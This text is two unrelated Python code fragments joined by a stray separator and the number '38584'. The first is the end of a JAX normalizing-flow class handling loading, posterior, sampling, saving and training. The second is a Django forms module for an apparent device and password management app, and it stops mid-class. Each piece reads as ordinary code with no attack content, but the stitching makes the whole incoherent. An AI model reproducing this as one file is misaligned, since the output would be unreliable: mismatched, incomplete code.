self.conditional_columns = save_dict["conditional_columns"]
self._input_dim = len(self.data_columns)
self.info = save_dict["info"]
# load the latent distribution
self._latent_info = save_dict["latent_info"]
self.latent = getattr(distributions, self._latent_info[0])(
*self._latent_info[1]
)
# load the error models
self.data_error_model = save_dict["data_error_model"]
self.condition_error_model = save_dict["condition_error_model"]
# load the bijector
self._bijector_info = save_dict["bijector_info"]
init_fun, _ = build_bijector_from_info(self._bijector_info)
_, self._forward, self._inverse = init_fun(
random.PRNGKey(0), self._input_dim
)
self._params = save_dict["params"]
# load the conditional means and stds
self._condition_means = save_dict["condition_means"]
self._condition_stds = save_dict["condition_stds"]
# set whether or not to automatically standard scale any
# conditions passed to the normalizing flow
self._autoscale_conditions = save_dict["autoscale_conditions"]
# if no file is provided, use provided parameters
else:
self.data_columns = tuple(data_columns)
self._input_dim = len(self.data_columns)
self.info = info
if conditional_columns is None:
self.conditional_columns = None
self._condition_means = None
self._condition_stds = None
else:
self.conditional_columns = tuple(conditional_columns)
self._condition_means = np.zeros(len(self.conditional_columns))
self._condition_stds = np.ones(len(self.conditional_columns))
# set whether or not to automatically standard scale any
# conditions passed to the normalizing flow
self._autoscale_conditions = autoscale_conditions
# set up the latent distribution
if latent is None:
self.latent = distributions.Normal(self._input_dim)
else:
self.latent = latent
self._latent_info = self.latent.info
# set up the error models
if data_error_model is None:
self.data_error_model = gaussian_error_model
else:
self.data_error_model = data_error_model
if condition_error_model is None:
self.condition_error_model = gaussian_error_model
else:
self.condition_error_model = condition_error_model
# set up the bijector with random params
init_fun, self._bijector_info = bijector
bijector_params, self._forward, self._inverse = init_fun(
random.PRNGKey(seed), self._input_dim
)
self._params = (self.latent._params, bijector_params)
def _get_conditions(self, inputs: pd.DataFrame) -> np.ndarray:
"""Return an array of the bijector conditions."""
# if this isn't a conditional flow, just return empty conditions
if self.conditional_columns is None:
conditions = np.zeros((inputs.shape[0], 1))
# if this a conditional flow, return an array of the conditions
else:
columns = list(self.conditional_columns)
conditions = np.array(inputs[columns].values)
conditions = (conditions - self._condition_means) / self._condition_stds
return conditions
def _get_err_samples(
self,
key,
inputs: pd.DataFrame,
err_samples: int,
type: str = "data",
skip: str = None,
) -> np.ndarray:
"""Draw error samples for each row of inputs. """
X = inputs.copy()
# get list of columns
if type == "data":
columns = list(self.data_columns)
error_model = self.data_error_model
elif type == "conditions":
if self.conditional_columns is None:
return np.zeros((err_samples * X.shape[0], 1))
else:
columns = list(self.conditional_columns)
error_model = self.condition_error_model
else:
raise ValueError("type must be `data` or `conditions`.")
# make sure all relevant variables have error columns
for col in columns:
# if errors not provided for the column, fill in zeros
if f"{col}_err" not in inputs.columns and col != skip:
X[f"{col}_err"] = np.zeros(X.shape[0])
# if we are skipping this column, fill in nan's
elif col == skip:
X[col] = np.nan * np.zeros(X.shape[0])
X[f"{col}_err"] = np.nan * np.zeros(X.shape[0])
# pull out relevant columns
err_columns = [col + "_err" for col in columns]
X, Xerr = np.array(X[columns].values), np.array(X[err_columns].values)
# generate samples
Xsamples = error_model(key, X, Xerr, err_samples)
Xsamples = Xsamples.reshape(X.shape[0] * err_samples, X.shape[1])
# delete the column corresponding to skip
if skip is not None:
idx = columns.index(skip)
Xsamples = np.delete(Xsamples, idx, axis=1)
# if these are samples of conditions, standard scale them!
if type == "conditions":
Xsamples = (Xsamples - self._condition_means) / self._condition_stds
return Xsamples
def _log_prob(
self, params: Pytree, inputs: np.ndarray, conditions: np.ndarray
) -> np.ndarray:
"""Log prob for arrays."""
# calculate log_prob
u, log_det = self._forward(params[1], inputs, conditions=conditions)
log_prob = self.latent.log_prob(params[0], u) + log_det
# set NaN's to negative infinity (i.e. zero probability)
log_prob = np.nan_to_num(log_prob, nan=np.NINF)
return log_prob
def log_prob(
self, inputs: pd.DataFrame, err_samples: int = None, seed: int = None
) -> np.ndarray:
"""Calculates log probability density of inputs.
Parameters
----------
inputs : pd.DataFrame
Input data for which log probability density is calculated.
Every column in self.data_columns must be present.
If self.conditional_columns is not None, those must be present
as well. If other columns are present, they are ignored.
err_samples : int, default=None
Number of samples from the error distribution to average over for
the log_prob calculation. If provided, Gaussian errors are assumed,
and method will look for error columns in `inputs`. Error columns
must end in `_err`. E.g. the error column for the variable `u` must
be `u_err`. Zero error assumed for any missing error columns.
seed : int, default=None
Random seed for drawing the samples with Gaussian errors.
Returns
-------
np.ndarray
Device array of shape (inputs.shape[0],).
"""
if err_samples is None:
# convert data to an array with columns ordered
columns = list(self.data_columns)
X = np.array(inputs[columns].values)
# get conditions
conditions = self._get_conditions(inputs)
# calculate log_prob
return self._log_prob(self._params, X, conditions)
else:
# validate nsamples
assert isinstance(
err_samples, int
), "err_samples must be a positive integer."
assert err_samples > 0, "err_samples must be a positive integer."
# get Gaussian samples
seed = onp.random.randint(1e18) if seed is None else seed
key = random.PRNGKey(seed)
X = self._get_err_samples(key, inputs, err_samples, type="data")
C = self._get_err_samples(key, inputs, err_samples, type="conditions")
# calculate log_probs
log_probs = self._log_prob(self._params, X, C)
probs = np.exp(log_probs.reshape(-1, err_samples))
return np.log(probs.mean(axis=1))
def posterior(
self,
inputs: pd.DataFrame,
column: str,
grid: np.ndarray,
marg_rules: dict = None,
normalize: bool = True,
err_samples: int = None,
seed: int = None,
batch_size: int = None,
nan_to_zero: bool = True,
) -> np.ndarray:
"""Calculates posterior distributions for the provided column.
Calculates the conditional posterior distribution, assuming the
data values in the other columns of the DataFrame.
Parameters
----------
inputs : pd.DataFrame
Data on which the posterior distributions are conditioned.
Must have columns matching self.data_columns, *except*
for the column specified for the posterior (see below).
column : str
Name of the column for which the posterior distribution
is calculated. Must be one of the columns in self.data_columns.
However, whether or not this column is one of the columns in
`inputs` is irrelevant.
grid : np.ndarray
Grid on which to calculate the posterior.
marg_rules : dict, optional
Dictionary with rules for marginalizing over missing variables.
The dictionary must contain the key "flag", which gives the flag
that indicates a missing value. E.g. if missing values are given
the value 99, the dictionary should contain {"flag": 99}.
The dictionary must also contain {"name": callable} for any
variables that will need to be marginalized over, where name is
the name of the variable, and callable is a callable that takes
the row of variables nad returns a grid over which to marginalize
the variable. E.g. {"y": lambda row: np.linspace(0, row["x"], 10)}.
Note: the callable for a given name must *always* return an array
of the same length, regardless of the input row.
err_samples : int, default=None
Number of samples from the error distribution to average over for
the posterior calculation. If provided, Gaussian errors are assumed,
and method will look for error columns in `inputs`. Error columns
must end in `_err`. E.g. the error column for the variable `u` must
be `u_err`. Zero error assumed for any missing error columns.
seed : int, default=None
Random seed for drawing the samples with Gaussian errors.
batch_size : int, default=None
Size of batches in which to calculate posteriors. If None, all
posteriors are calculated simultaneously. Simultaneous calculation
is faster, but memory intensive for large data sets.
normalize : boolean, default=True
Whether to normalize the posterior so that it integrates to 1.
nan_to_zero : bool, default=True
Whether to convert NaN's to zero probability in the final pdfs.
Returns
-------
np.ndarray
Device array of shape (inputs.shape[0], grid.size).
"""
# get the index of the provided column, and remove it from the list
columns = list(self.data_columns)
idx = columns.index(column)
columns.remove(column)
nrows = inputs.shape[0]
batch_size = nrows if batch_size is None else batch_size
# make sure indices run 0 -> nrows
inputs = inputs.reset_index(drop=True)
if err_samples is not None:
# validate nsamples
assert isinstance(
err_samples, int
), "err_samples must be a positive integer."
assert err_samples > 0, "err_samples must be a positive integer."
# set the seed
seed = onp.random.randint(1e18) if seed is None else seed
key = random.PRNGKey(seed)
# empty array to hold pdfs
pdfs = np.zeros((nrows, len(grid)))
# if marginalization rules were passed, we will loop over the rules
# and repeatedly call this method
if marg_rules is not None:
# if the flag is NaN, we must use np.isnan to check for flags
if onp.isnan(marg_rules["flag"]):
def check_flags(data):
return onp.isnan(data)
# else we use np.isclose to check for flags
else:
def check_flags(data):
return onp.isclose(data, marg_rules["flag"])
# first calculate pdfs for unflagged rows
unflagged_idx = inputs[
~check_flags(inputs[columns]).any(axis=1)
].index.tolist()
unflagged_pdfs = self.posterior(
inputs=inputs.iloc[unflagged_idx],
column=column,
grid=grid,
err_samples=err_samples,
seed=seed,
batch_size=batch_size,
normalize=False,
nan_to_zero=nan_to_zero,
)
# save these pdfs in the big array
pdfs = ops.index_update(
pdfs,
ops.index[unflagged_idx, :],
unflagged_pdfs,
indices_are_sorted=True,
unique_indices=True,
)
# we will keep track of all the rows we've already calculated
# posteriors for
already_done = unflagged_idx
# now we will loop over the rules in marg_rules
for name, rule in marg_rules.items():
# ignore the flag, because that's not a column in the data
if name == "flag":
continue
# get the list of new rows for which we need to calculate posteriors
flagged_idx = inputs[check_flags(inputs[name])].index.tolist()
flagged_idx = list(set(flagged_idx).difference(already_done))
# if flagged_idx is empty, move on!
if len(flagged_idx) == 0:
continue
# get the marginalization grid for each row
marg_grids = (
inputs.iloc[flagged_idx]
.apply(rule, axis=1, result_type="expand")
.values
)
# make a new data frame with the marginalization grids replacing
# the values of the flag in the column
marg_inputs = pd.DataFrame(
np.repeat(
inputs.iloc[flagged_idx].values, marg_grids.shape[1], axis=0
),
columns=inputs.columns,
)
marg_inputs[name] = marg_grids.reshape(marg_inputs.shape[0], 1)
# remove the error column if it's present
marg_inputs.drop(f"{name}_err", axis=1, inplace=True, errors="ignore")
# calculate posteriors for these
marg_pdfs = self.posterior(
inputs=marg_inputs,
column=column,
grid=grid,
marg_rules=marg_rules,
err_samples=err_samples,
seed=seed,
batch_size=batch_size,
normalize=False,
nan_to_zero=nan_to_zero,
)
# sum over the marginalized dimension
marg_pdfs = marg_pdfs.reshape(
len(flagged_idx), marg_grids.shape[1], grid.size
)
marg_pdfs = marg_pdfs.sum(axis=1)
# save the new pdfs in the big array
pdfs = ops.index_update(
pdfs,
ops.index[flagged_idx, :],
marg_pdfs,
indices_are_sorted=True,
unique_indices=True,
)
# add these flagged indices to the list of rows already done
already_done += flagged_idx
# now for the main posterior calculation loop
else:
# loop through batches
for batch_idx in range(0, nrows, batch_size):
# get the data batch
# and, if this is a conditional flow, the correpsonding conditions
batch = inputs.iloc[batch_idx : batch_idx + batch_size]
# if not drawing samples, just grab batch and conditions
if err_samples is None:
conditions = self._get_conditions(batch)
batch = np.array(batch[columns].values)
# if only drawing condition samples...
elif len(self.data_columns) == 1:
conditions = self._get_err_samples(
key, batch, err_samples, type="conditions"
)
batch = np.repeat(batch[columns].values, err_samples, axis=0)
# if drawing data and condition samples...
else:
conditions = self._get_err_samples(
key, batch, err_samples, type="conditions"
)
batch = self._get_err_samples(
key, batch, err_samples, skip=column, type="data"
)
# make a new copy of each row for each value of the column
# for which we are calculating the posterior
batch = np.hstack(
(
np.repeat(batch[:, :idx], len(grid), axis=0,),
np.tile(grid, len(batch))[:, None],
np.repeat(batch[:, idx:], len(grid), axis=0,),
)
)
# make similar copies of the conditions
conditions = np.repeat(conditions, len(grid), axis=0)
# calculate probability densities
log_prob = self._log_prob(self._params, batch, conditions).reshape(
(-1, len(grid))
)
prob = np.exp(log_prob)
# if we were Gaussian sampling, average over the samples
if err_samples is not None:
prob = prob.reshape(-1, err_samples, len(grid))
prob = prob.mean(axis=1)
# add the pdfs to the bigger list
pdfs = ops.index_update(
pdfs,
ops.index[batch_idx : batch_idx + batch_size, :],
prob,
indices_are_sorted=True,
unique_indices=True,
)
if normalize:
# normalize so they integrate to one
pdfs = pdfs / np.trapz(y=pdfs, x=grid).reshape(-1, 1)
if nan_to_zero:
# set NaN's equal to zero probability
pdfs = np.nan_to_num(pdfs, nan=0.0)
return pdfs
def sample(
self,
nsamples: int = 1,
conditions: pd.DataFrame = None,
save_conditions: bool = True,
seed: int = None,
) -> pd.DataFrame:
"""Returns samples from the normalizing flow.
Parameters
----------
nsamples : int, default=1
The number of samples to be returned.
conditions : pd.DataFrame, optional
If this is a conditional flow, you must pass conditions for
each sample. nsamples will be drawn for each row in conditions.
save_conditions : bool, default=True
If true, conditions will be saved in the DataFrame of samples
that is returned.
seed : int, optional
Sets the random seed for the samples.
Returns
-------
pd.DataFrame
Pandas DataFrame of samples.
"""
# validate nsamples
assert isinstance(nsamples, int), "nsamples must be a positive integer."
assert nsamples > 0, "nsamples must be a positive integer."
if self.conditional_columns is not None and conditions is None:
raise ValueError(
f"Must provide the following conditions\n{self.conditional_columns}"
)
# if this isn't a conditional flow, get empty conditions
if self.conditional_columns is None:
conditions = np.zeros((nsamples, 1))
# otherwise get conditions and make `nsamples` copies of each
else:
conditions = self._get_conditions(conditions)
conditions = np.repeat(conditions, nsamples, axis=0)
# draw from latent distribution
u = self.latent.sample(self._params[0], conditions.shape[0], seed)
# take the inverse back to the data distribution
x = self._inverse(self._params[1], u, conditions=conditions)[0]
# if not conditional, or save_conditions is False, this is all we need
if self.conditional_columns is None or save_conditions is False:
x = pd.DataFrame(x, columns=self.data_columns)
# but if conditional and save_conditions is True,
# save conditions with samples
else:
# unscale the conditons
conditions = conditions * self._condition_stds + self._condition_means
x = pd.DataFrame(
np.hstack((x, conditions)),
columns=self.data_columns + self.conditional_columns,
)
# return the samples!
return x
def _save_dict(self):
"""Returns the dictionary of all flow params to be saved."""
save_dict = {"class": self.__class__.__name__}
keys = [
"data_columns",
"conditional_columns",
"condition_means",
"condition_stds",
"data_error_model",
"condition_error_model",
"autoscale_conditions",
"info",
"latent_info",
"bijector_info",
"params",
]
for key in keys:
try:
save_dict[key] = getattr(self, key)
except AttributeError:
try:
save_dict[key] = getattr(self, "_" + key)
except AttributeError:
save_dict[key] = None
return save_dict
def save(self, file: str):
"""Saves the flow to a file.
Pickles the flow and saves it to a file that can be passed as
the `file` argument during flow instantiation.
WARNING: Currently, this method only works for bijectors that are
implemented in the `bijectors` module. If you want to save a flow
with a custom bijector, you either need to add the bijector to that
module, or handle the saving and loading on your end.
Parameters
----------
file : str
Path to where the flow will be saved.
Extension `.pkl` will be appended if not already present.
"""
save_dict = self._save_dict()
with open(file, "wb") as handle:
pickle.dump(save_dict, handle, recurse=True)
def train(
self,
inputs: pd.DataFrame,
epochs: int = 50,
batch_size: int = 1024,
optimizer: Optimizer = None,
loss_fn: Callable = None,
convolve_errs: bool = False,
seed: int = 0,
verbose: bool = False,
) -> list:
"""Trains the normalizing flow on the provided inputs.
Parameters
----------
inputs : pd.DataFrame
Data on which to train the normalizing flow.
Must have columns matching self.data_columns.
epochs : int, default=50
Number of epochs to train.
batch_size : int, default=1024
Batch size for training.
optimizer : jax Optimizer, default=adam(step_size=1e-3)
An optimizer from jax.experimental.optimizers.
loss_fn : Callable, optional
A function to calculate the loss: loss = loss_fn(params, x).
If not provided, will be -mean(log_prob).
convolve_errs : bool, default=False
Whether to draw new data from the error distributions during
each epoch of training. Assumes errors are Gaussian, and method
will look for error columns in `inputs`. Error columns must end
in `_err`. E.g. the error column for the variable `u` must be
`u_err`. Zero error assumed for any missing error columns.
seed : int, default=0
A random seed to control the batching and the (optional)
error sampling.
verbose : bool, default=False
If true, print the training loss every 5% of epochs.
Returns
-------
list
List of training losses from every epoch.
"""
# validate epochs
if not isinstance(epochs, int) or epochs <= 0:
raise ValueError("epochs must be a positive integer.")
# if no loss_fn is provided, use the default loss function
if loss_fn is None:
@jit
def loss_fn(params, x, c):
return -np.mean(self._log_prob(params, x, c))
# initialize the optimizer
optimizer = adam(step_size=1e-3) if optimizer is None else optimizer
opt_init, opt_update, get_params = optimizer
opt_state = opt_init(self._params)
# define the training step function
@jit
def step(i, opt_state, x, c):
params = get_params(opt_state)
gradients = grad(loss_fn)(params, x, c)
return opt_update(i, gradients, opt_state)
# get list of data columns
columns = list(self.data_columns)
# if this is a conditional flow, and autoscale_conditions == True
# save the means and stds of the conditional columns
if self.conditional_columns is not None and self._autoscale_conditions:
self._condition_means = np.array(
inputs[list(self.conditional_columns)].values.mean(axis=0)
)
condition_stds = np.array(
inputs[list(self.conditional_columns)].values.std(axis=0)
)
self._condition_stds = np.where(condition_stds != 0, condition_stds, 1)
# define a function to return batches
if convolve_errs:
def get_batch(sample_key, x, type):
return self._get_err_samples(sample_key, x, 1, type=type)
else:
def get_batch(sample_key, x, type):
if type == "conditions":
return self._get_conditions(x)
else:
return np.array(x[columns].values)
# get random seed for training loop
key = random.PRNGKey(seed)
if verbose:
print(f"Training {epochs} epochs \nLoss:")
# save the initial loss
X = np.array(inputs[columns].values)
C = self._get_conditions(inputs)
losses = [loss_fn(self._params, X, C)]
if verbose:
print(f"(0) {losses[-1]:.4f}")
# loop through training
itercount = itertools.count()
for epoch in range(epochs):
# new permutation of batches
permute_key, sample_key, key = random.split(key, num=3)
idx = random.permutation(permute_key, inputs.shape[0])
X = inputs.iloc[idx]
# loop through batches and step optimizer
for batch_idx in range(0, len(X), batch_size):
# if sampling from the error distribution, this returns a
# Gaussian sample of the batch. Else just returns batch as a
# jax array
batch = get_batch(
sample_key, X.iloc[batch_idx : batch_idx + batch_size], type="data"
)
batch_conditions = get_batch(
sample_key,
X.iloc[batch_idx : batch_idx + batch_size],
type="conditions",
)
opt_state = step(next(itercount), opt_state, batch, batch_conditions,)
# save end-of-epoch training loss
params = get_params(opt_state)
losses.append(
loss_fn(params, np.array(X[columns].values), self._get_conditions(X),)
)
if verbose and (
epoch % max(int(0.05 * epochs), 1) == 0 or (epoch + 1) == epochs
):
print(f"({epoch+1}) {losses[-1]:.4f}")
# update the flow parameters with the final training state
self._params = get_params(opt_state)
return losses
|
38584
|
from django import forms
class EmptyForm(forms.Form):
pass
class LoginForm(forms.Form):
username = forms.CharField(
max_length=50,
label='Username'
)
password = forms.CharField(
max_length=32,
label='Password',
widget=forms.PasswordInput(),
required=True
)
class DeleteForm(forms.Form):
verify = forms.CharField(
initial='true',
widget=forms.HiddenInput()
)
class ConfirmForm(forms.Form):
verify = forms.CharField(
initial='true',
widget=forms.HiddenInput()
)
class ViewAddForm(forms.Form):
name = forms.CharField(
max_length=50,
label='Name'
)
description = forms.CharField(
max_length=100,
required=False,
label='Description'
)
class ViewUpdateForm(forms.Form):
name = forms.CharField(
max_length=50,
label='Name'
)
description = forms.CharField(
max_length=100,
required=False,
label='Description'
)
class ViewSearchForm(forms.Form):
searchstring = forms.CharField(
max_length=50,
required=True,
widget=forms.TextInput(attrs={'id': 'searchbox'})
)
class ViewAdvancedSearchForm(forms.Form):
searchAttribute = forms.CharField(
max_length=50,
required=True
)
searchValue = forms.CharField(
max_length=50,
required=False
)
attributesList = forms.CharField(
max_length=256,
required=False
)
OPTIONS = (
('devices', 'devices'),
('device categories', 'device categories'),
('passwords', 'passwords'),
('password categories', 'password categories'),
('networks', 'networks')
)
displayTypes = forms.MultipleChoiceField(
choices=OPTIONS,
required=False
)
class NetworkTreeAddForm(forms.Form):
name = forms.CharField(
max_length=50,
label='Name'
)
protocol = forms.ChoiceField(
label='Protocol',
choices=(('ipv4', 'ipv4'), ('ipv6', 'ipv6'))
)
class NetworkAddForm(forms.Form):
name = forms.CharField(
max_length=50,
label='Address',
help_text='The network/address in CIDR form (x.x.x.x or x.x.x.x/xx)'
)
description = forms.CharField(
max_length=100,
required=False,
label='Description'
)
class NetworkRangeAddForm(forms.Form):
range = forms.CharField(
max_length=50,
label='Range'
)
description = forms.CharField(
max_length=100,
required=False,
label='Description'
)
class NetworkDeleteForm(forms.Form):
recursive = forms.BooleanField(
label='Recursive delete',
required=False
)
class PasswordKeyAddForm(forms.Form):
name = forms.CharField(
max_length=50,
label='Name'
)
key = forms.CharField(
max_length=32,
label='Key',
widget=forms.PasswordInput(),
required=False
)
validate = forms.CharField(
max_length=32,
label='Key (again)',
widget=forms.PasswordInput(),
required=False
)
description = forms.CharField(
max_length=100,
required=False,
label='Description'
)
class CounterAddBasicForm(forms.Form):
name = forms.CharField(
max_length=50,
label='Name'
)
description = forms.CharField(
max_length=100,
required=False,
label='Description'
)
class CounterAddLoopingForm(forms.Form):
name = forms.CharField(
max_length=50,
label='Name'
)
description = forms.CharField(
max_length=100,
required=False,
label='Description'
)
values = forms.CharField(
max_length=5000,
label='Values',
help_text='one value per row',
widget=forms.Textarea(attrs={'cols':'30', 'rows': '5'})
)
class CounterUpdateBasicForm(forms.Form):
name = forms.CharField(
max_length=50,
label='Name'
)
description = forms.CharField(
max_length=100,
required=False,
label='Description'
)
value = forms.DecimalField(
min_value=0,
decimal_places=0,
label='Value'
)
class CounterUpdateLoopingForm(forms.Form):
name = forms.CharField(
max_length=50,
label='Name'
)
description = forms.CharField(
max_length=100,
required=False,
label='Description'
)
value = forms.CharField(
max_length=50,
label='Value'
)
values = forms.CharField(
max_length=5000,
label='Values',
help_text='one value per row',
widget=forms.Textarea(attrs={'cols':'30', 'rows': '5'})
)
class CounterSetForm(forms.Form):
value = forms.DecimalField(
min_value=0,
decimal_places=0,
label='Value'
)
class PasswordAddForm(forms.Form):
pw_username = forms.CharField(
max_length=50,
label='Username',
required=False
)
pw_password = forms.CharField(
max_length=250,
label='Password',
widget=forms.PasswordInput(),
required=False,
help_text='Max length: 250, leave empty for generated password.'
)
validate = forms.CharField(
max_length=250,
label='Password (again)',
widget=forms.PasswordInput(),
required=False
)
description = forms.CharField(
max_length=100,
required=False,
label='Description'
)
def __init__(self, password_keys, *args, **kwargs):
super(PasswordAddForm, self).__init__(*args, **kwargs)
keylist = [('__no-password-key__', 'None')]
for key in password_keys:
value = (key.oid, key.attributes['name'])
if key.attributes.get('default', False) is True:
keylist.insert(0, value)
else:
keylist.append(value)
field = forms.ChoiceField(
label='Password key',
choices=keylist
)
self.fields['passwordkey'] = field
class PasswordUpdateForm(forms.Form):
pw_username = forms.CharField(max_length = 50, label = 'Username',
required = False)
pw_password = forms.CharField(max_length = 250, label = 'Password',
widget = forms.PasswordInput(), required = False,
help_text = 'Max length: 250, leave empty for generated password.')
validate = forms.CharField(max_length = 250, label = 'Password (again)',
widget = forms.PasswordInput(), required = False)
description = forms.CharField(max_length = 100, required = False,
label = 'Description')
def __init__(self, password_keys, *args, **kwargs):
super(PasswordUpdateForm, self).__init__(*args, **kwargs)
keylist = [('__no-password-key__', 'None')]
for key in password_keys:
value = (key.oid, key.attributes['name'])
if key.attributes.get('default', False) is True:
keylist.insert(0, value)
else:
keylist.append(value)
field = forms.ChoiceField(label = 'Password key', choices = keylist)
self.fields['passwordkey'] = field
class DeviceTemplateAddForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
description = forms.CharField(max_length = 80, label = 'Description',
help_text = 'Description of this template.', required = False)
inheritance_only = forms.BooleanField(label = 'Inheritance only',
required = False,
initial = False,
help_text = 'Template is used for inheritance only.')
device_creation = forms.BooleanField(label = 'Device creation',
required = False,
initial = False,
help_text = 'Template is used for device creation.')
def __init__(self, templates, *args, **kwargs):
super(DeviceTemplateAddForm, self).__init__(*args, **kwargs)
choices = []
for template in templates:
choices.append((template.oid,
template.attributes.get('name', '[UKNOWN]')))
field = forms.MultipleChoiceField(required = False,
label = 'Inherited templates',
choices = choices)
self.fields['inherited_templates'] = field
class NetworkTemplateAddForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
description = forms.CharField(max_length = 80, label = 'Description',
help_text = 'Description of this template.', required = False)
inheritance_only = forms.BooleanField(label = 'Inheritance only',
required = False,
initial = False,
help_text = 'Template is used for inheritance only.')
def __init__(self, templates, *args, **kwargs):
super(NetworkTemplateAddForm, self).__init__(*args, **kwargs)
choices = []
for template in templates:
choices.append((template.oid,
template.attributes.get('name', '[UKNOWN]')))
field = forms.MultipleChoiceField(required = False,
label = 'Inherited templates',
choices = choices)
self.fields['inherited_templates'] = field
class DeviceTemplateUpdateForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
description = forms.CharField(max_length = 80, label = 'Description',
help_text = 'Description of this template.', required = False)
inheritance_only = forms.BooleanField(label = 'Inheritance only',
required = False,
initial = False,
help_text = 'Template is used for inheritance only.')
device_creation = forms.BooleanField(label = 'Device creation',
required = False,
initial = False,
help_text = 'Template is used for device creation.')
def __init__(self, templates, *args, **kwargs):
super(DeviceTemplateUpdateForm, self).__init__(*args, **kwargs)
choices = []
for template in templates:
choices.append((template.oid,
template.attributes.get('name', '[UKNOWN]')))
field = forms.MultipleChoiceField(required = False,
label = 'Inherited templates',
choices = choices)
self.fields['inherited_templates'] = field
class NetworkTemplateUpdateForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
description = forms.CharField(max_length = 80, label = 'Description',
help_text = 'Description of this template.', required = False)
inheritance_only = forms.BooleanField(label = 'Inheritance only',
required = False,
initial = False,
help_text = 'Template is used for inheritance only.')
def __init__(self, templates, *args, **kwargs):
super(NetworkTemplateUpdateForm, self).__init__(*args, **kwargs)
choices = []
for template in templates:
choices.append((template.oid,
template.attributes.get('name', '[UKNOWN]')))
field = forms.MultipleChoiceField(required = False,
label = 'Inherited templates',
choices = choices)
self.fields['inherited_templates'] = field
class TemplateRuleTextAddForm(forms.Form):
attr_name = forms.CharField(max_length = 50, label = 'Attribute name',
help_text = 'Name of attribute to create.')
hidden = forms.BooleanField(label = 'Hide attribute',
required = False,
initial = False,
help_text = 'If true, the attribute will hidden per default if it is large/wikitext.')
important = forms.BooleanField(label = 'Important attribute',
required = False,
initial = False,
help_text = 'If true, the attribute will be displayed on the device/entity overview page.')
large = forms.BooleanField(label = 'Large attribute',
required = False,
initial = False,
help_text = 'If true, the attribute will have a separate display box.')
wikitext = forms.BooleanField(label = 'Wikitext attribute',
required = False,
initial = False,
help_text = 'If true, the attribute will be displayed using wikitext parsing, implies "large".')
description = forms.CharField(max_length = 80, label = 'Description',
help_text = 'Description of this rule.', required = False)
priority = forms.IntegerField(label = 'Priority',
min_value = 0, initial = 10,
help_text = 'The priority of this rule when using the templates, lower value will be displayed first.')
versions = forms.IntegerField(label = 'Versions',
min_value = 1, initial = 1,
help_text = 'Number of stored versions of the attribute.')
class TemplateRuleFixedAddForm(forms.Form):
attr_name = forms.CharField(max_length = 50, label = 'Attribute name',
help_text = 'Name of attribute to create.')
string_value = forms.CharField(max_length = 100, label = 'String value',
help_text = 'The created attributes value.')
variable_expansion = forms.BooleanField(label = 'Expand variables',
required = False,
initial = False)
important = forms.BooleanField(label = 'Important attribute',
required = False,
initial = False,
help_text = 'If true, the attribute will be displayed on the device/entity overview page.')
description = forms.CharField(max_length = 80, label = 'Description',
help_text = 'Description of this rule.', required = False)
priority = forms.IntegerField(label = 'Priority',
min_value = 0, initial = 10,
help_text = 'The priority of this rule when using the templates, lower value will be displayed first.')
versions = forms.IntegerField(label = 'Versions',
min_value = 1, initial = 1,
help_text = 'Number of stored versions of the attribute.')
class TemplateRuleRegmatchAddForm(forms.Form):
attr_name = forms.CharField(max_length = 50, label = 'Attribute name',
help_text = 'Name of attribute to create.')
regexp = forms.CharField(max_length = 50, label = 'Regexp',
help_text = 'Regular expression that must match the input value.')
description = forms.CharField(max_length = 80, label = 'Description',
help_text = 'Description of this rule.', required = False)
versions = forms.IntegerField(label = 'Versions',
min_value = 1, initial = 1,
help_text = 'Number of stored versions of the attribute.')
priority = forms.IntegerField(label = 'Priority',
min_value = 0, initial = 10,
help_text = 'The priority of this rule when using the templates, lower value will be displayed first.')
important = forms.BooleanField(label = 'Important attribute',
required = False,
initial = False,
help_text = 'If true, the attribute will be displayed on the device/entity overview page.')
class TemplateRuleBoolAddForm(forms.Form):
attr_name = forms.CharField(max_length = 50, label = 'Attribute name',
help_text = 'Name of attribute to create.')
default = forms.ChoiceField(label = 'Default',
choices = (('true', 'True'), ('false', 'False')),
help_text = 'Default value for attribute.')
description = forms.CharField(max_length = 80, label = 'Description',
help_text = 'Description of this rule.', required = False)
versions = forms.IntegerField(label = 'Versions',
min_value = 1, initial = 1,
help_text = 'Number of stored versions of the attribute.')
priority = forms.IntegerField(label = 'Priority',
min_value = 0, initial = 10,
help_text = 'The priority of this rule when using the templates, lower value will be displayed first.')
important = forms.BooleanField(label = 'Important attribute',
required = False,
initial = False,
help_text = 'If true, the attribute will be displayed on the device/entity overview page.')
class TemplateRuleIntAddForm(forms.Form):
attr_name = forms.CharField(max_length = 50, label = 'Attribute name',
help_text = 'Name of attribute to create.')
default = forms.IntegerField(label = 'Default',
initial = 0,
help_text = 'Default value.')
description = forms.CharField(max_length = 80, label = 'Description',
help_text = 'Description of this rule.', required = False)
versions = forms.IntegerField(label = 'Versions',
min_value = 1, initial = 1,
help_text = 'Number of stored versions of the attribute.')
priority = forms.IntegerField(label = 'Priority',
min_value = 0, initial = 10,
help_text = 'The priority of this rule when using the templates, lower value will be displayed first.')
important = forms.BooleanField(label = 'Important attribute',
required = False,
initial = False,
help_text = 'If true, the attribute will be displayed on the device/entity overview page.')
class TemplateRuleDeleteAttributeAddForm(forms.Form):
attr_name = forms.CharField(max_length = 50, label = 'Attribute name',
help_text = 'Name of attribute to delete.')
description = forms.CharField(max_length = 80, label = 'Description',
help_text = 'Description of this rule.', required = False)
priority = forms.IntegerField(label = 'Priority',
min_value = 0, initial = 10,
help_text = 'The priority of this rule when using the templates, lower value will be displayed first.')
class TemplateRuleFlushNodesAddForm(forms.Form):
description = forms.CharField(max_length = 80, label = 'Description',
help_text = 'Description of this rule.', required = False)
priority = forms.IntegerField(label = 'Priority',
min_value = 0, initial = 10,
help_text = 'The priority of this rule when using the templates, lower value will be displayed first.')
def __init__(self, node_types, *args, **kwargs):
super(TemplateRuleFlushNodesAddForm, self).__init__(*args, **kwargs)
choices = []
for node_type in node_types:
choices.append((node_type, node_type))
field = forms.MultipleChoiceField(required = False,
label = 'Included node types',
choices = choices,
help_text = 'If no node types are chosen for include, all types will match.')
self.fields['include'] = field
field = forms.MultipleChoiceField(required = False,
label = 'Excluded node types',
choices = choices)
self.fields['exclude'] = field
class TemplateRuleFlushAssociationsAddForm(forms.Form):
description = forms.CharField(max_length = 80, label = 'Description',
help_text = 'Description of this rule.', required = False)
priority = forms.IntegerField(label = 'Priority',
min_value = 0, initial = 10,
